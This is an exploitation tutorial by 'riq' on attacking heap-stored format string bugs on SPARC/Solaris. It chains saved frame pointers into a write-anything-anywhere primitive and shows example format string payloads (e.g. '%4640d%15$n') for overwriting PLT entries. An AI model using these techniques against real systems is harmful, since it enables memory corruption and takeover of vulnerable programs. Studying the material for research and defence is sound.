Exploiting heap format strings (in SPARC)

Written by : riq

1 - Introduction

Usually the format strings lies on the stack. But there are cases where it is stored on the heap, and you CAN'T see it.

scut (team teso) talks about these format strings in his article 'Exploiting Format String Vulnerabilities' (section 6.4)

Here I present a way to deal with these format strings in a generic way within SPARC (and big-endian machines). It may be possible to use a similar technique for i386.

2 - The stack

In the stack you will find stack frames. These stack frames have local variables, registers, pointers to previous stack frames, return addresses, etc.

Since with format strings we can see the stack, we are going to study it more carefully.

The stack frames in SPARC look more or less like the following:

          frame 0              frame 1               frame 2
         [  l0   ]     +----> [  l0   ]      +----> [  l0   ]
         [  l1   ]     |      [  l1   ]      |      [  l1   ]
            ...        |         ...         |         ...   
         [  l7   ]     |      [  l7   ]      |      [  l7   ]
         [  i0   ]     |      [  i0   ]      |      [  i0   ]
         [  i1   ]     |      [  i1   ]      |      [  i1   ]
            ...        |         ...         |         ...   
         [  i5   ]     |      [  i5   ]      |      [  i5   ]
         [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
         [  i7   ]            [  i7   ]             [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

And so on...

The fp register is a pointer to the caller frame pointer. As you may guess, 'fp' means frame pointer.

The temp_N are local variables that are saved in the stack. And the frame 1 starts where the frame 0's local variables end, and the frame 2 starts, where the frame 1's local variables end, and so on.

All these frames are stored in the stack. So we can see all of these stack frames with our format strings.

3 - The trick

The trick lies in the fact that every stack frame has a pointer to the previous stack frame. Furthermore, the more pointers to the stack we have, the better.

Why ? Because if we have a pointer to our own stack, we can overwrite the address that it points to with any value.

3.1 - Example 1

Suppose that we want to put the value 0x1234 in frame 1's l0. What we will try to do is to build a format string, whose length, by the time we've reached the stack frame 0's fp by adding format characters, equals 0x1234. At that point we place a '%n' character in the format string.

Supposing that the first argument that we see is the frame 0's l0 register, we should have a format string like the following (in python):

  '%8x' * 8 +     # pop the 8 registers 'l'
  '%8x' * 5 +     # pop the first 5 'i' registers
  '%4640d'  +     # modify the length of my string (4640 is 0x1220) and...
  '%n'            # I write where fp is pointing (which is frame 1's l0)

So, after the format string has been executed, our stack should look like this:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x00001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

3.2 - Example 2

If we decided on a bigger number, like 0x20001234, we should find 2 pointers that point to the same address in the stack. It should be something like this:

          frame 0              frame 1 
         [  l0   ]     +----> [  l0   ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]

[ Note: Not always are we going to find 2 pointers that point to the same address, though it is not rare. ]

So, our format string should look like this:

  '%8x' * 8 +     # pop the 8 registers 'l'
  '%8x' * 5 +     # pop the first 5 registers 'i'
  '%4640d'  +     # modify the length of my format string (4640 is 0x1220)
  '%n'            # I write where fp is pointing (which is frame 1's l0)
  '%3530d'  +     # again, I modify the length of the format string
  '%hn'           # and I write again, but only the hi part this time!

And we would get the following:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]     |      [  i7   ]
         [ temp 1] ----+      [ temp 1]
                              [ temp 2]

3.3 - Example 3

In the case that we only have 1 pointer, we can get the same result by using the 'direct access' in the format string, with %argument_number$, where 'argument_number' is a number between 0 and 30 (in Solaris).

My format string should be the following:

    '%4640d' +  # change the length
    '%15$n'  +  # I write where argument 15 is pointing (arg 15 is fp!)
    '%3530d' +  # change the length again
    '%15$hn'    # write again, but only the hi part!

Therefore, we would arrive at the same result:

          frame 0              frame 1 
         [  l0   ]     +----> [ 0x20001234 ]
         [  l1   ]     |      [  l1   ]
            ...        |         ...   
         [  l7   ]     |      [  l7   ]
         [  i0   ]     |      [  i0   ]
         [  i1   ]     |      [  i1   ]
            ...        |         ...   
         [  i5   ]     |      [  i5   ]
         [  fp   ] ----+      [  fp   ]
         [  i7   ]            [  i7   ]
         [ temp 1]            [ temp 1]
                              [ temp 2]

3.4 - Example 4

But it could well happen that I don't have 2 pointers that point to the same address in the stack, and the first address that points to the stack is outside the scope of the first 30 arguments. What could I then do ?

Remember that with plain '%n', you can write very large numbers, like 0x00028000 and higher. You should also keep in mind that the binary's PLT is usually located in very low addresses, like 0x0002????. So, with just one pointer that points to the stack, you can get a pointer that points to the binary's PLT.

I don't believe a graphic is necessary in this example.

4 - Abusing the 4-bytes-write-anything-anywhere primitive


4.1 - Example 5

In order to get a 4-bytes-write-anything-anywhere primitive we should repeat what was done with the stack frame 0, and do it again for another stack frame, like frame 1. Our result should look something like the following:

      frame 0              frame 1               frame 2
     [  l0   ]     +----> [0x00029e8c]   +----> [0x00029e8e]
     [  l1   ]     |      [  l1   ]      |      [  l1   ]
        ...        |         ...         |         ...   
     [  l7   ]     |      [  l7   ]      |      [  l7   ]
     [  i0   ]     |      [  i0   ]      |      [  i0   ]
     [  i1   ]     |      [  i1   ]      |      [  i1   ]
        ...        |         ...         |         ...   
     [  i5   ]     |      [  i5   ]      |      [  i5   ]
     [  fp   ] ----+      [  fp   ]  ----+      [  fp   ]
     [  i7   ]            [  i7   ]      |      [  i7   ]
     [ temp 1]            [ temp 1]      |
                          [ temp 2]  ----+
                          [ temp 3]

  [Note: As long as the code we want to change is located in 0x00029e8c ]

So, now that we have 2 pointers, one that points to 0x00029e8c and another that points to 0x00029e8e, we have finally achieved our goal! Now, we can exploit this situation just like any other format string vulnerability :)

The format string will look like this:

    '%4640d' +  # change the length
    '%15$n'  +  # with 'direct access' I write the lower part
                # of frame 1's l0
    '%3530d' +  # change the length again
    '%15$hn' +  # overwrite the higher part
    '%9876d' +  # change the length
    '%18$hn' +  # And write like any format string exploit!


    '%8x' * 13+ # pop 13 arguments (from argument 15)
    '%6789d' +  # change length
    '%n'     +  # write lower part
    '%8x'    +  # pop
    '%1122d' +  # modify length
    '%hn'    +  # write higher part
    '%2211d' +  # modify length
    '%hn'       # And write, again, like any format string exploit.

As you can see, this was done with just one format string. But this is not always possible. If we can't build 2 pointers, what we need to do, is to abuse the format string twice.

Firstly, we build a pointer that points towards 0x00029e8c. Then, we overwrite the value that 0x00029e8c points to with '%hn'.

The second time in which we abuse of the format string, we do the same as we did before, but with a pointer to 0x00029e8e.

5 - Conclusion


5.1 - Is it dangerous to overwrite the l0 (of the stack frames) ?

This is not perfect, but practice shows that you should not have any problem in changing the value of l0. But, would you be unlucky, you may prefer to modify the l0's that belongs to the main() and _start() stack frames.

5.2 - Is this reliable ?

If you know the state of the stack, or if you know the sizes of the stack frames, it is reliable. Otherwise, this technique wont help you much.

I think when you have to overwrite values that are located in addresses that has zeros, this may be your only hope, since, you won't be able to put a zero in your format string (because it will truncate your string).

Also, the binaries' PLT are located in lower addresses and it is more reliable to overwrite the binary's PLT than the libc's PLT. Why is this so? Because, I would guess, in Solaris libc changes more frequently than the binary that you want to exploit. And probably, the binary you want to exploit will never change!

5.3 - Can this work in i386 ?

Yes, probably. I think you may have a problem with '%n' and '%hn', since both of them write the same part of the memory (i386 is little-endian), but I believe the rest works fine for i386.

6 - Final


6.1 - References

This very complete format strings article by scut

6.2 - Thanks

Juliano, for letting me know that I can overwrite, as may times as I want an address using 'direct access', and other tips about format strings.

Gera, for his ideas, suggestions and fixes.

Javier, for helping me in SPARC.

Bombi, for trying her best to correct my English.

And Bruce, for correcting my English, too.

--
riq